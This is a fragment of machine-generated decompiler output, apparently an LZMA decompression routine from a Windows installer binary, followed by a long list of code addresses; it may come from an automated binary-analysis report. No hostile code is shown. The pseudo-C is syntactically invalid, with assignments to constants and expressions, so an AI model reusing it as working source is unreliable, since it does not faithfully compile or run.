												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                  0x00000000
                                                  0x00406473
                                                  0x00406473
                                                  0x00406477
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a5
                                                  0x004064ab
                                                  0x004064bd
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x00406479
                                                  0x0040647f
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
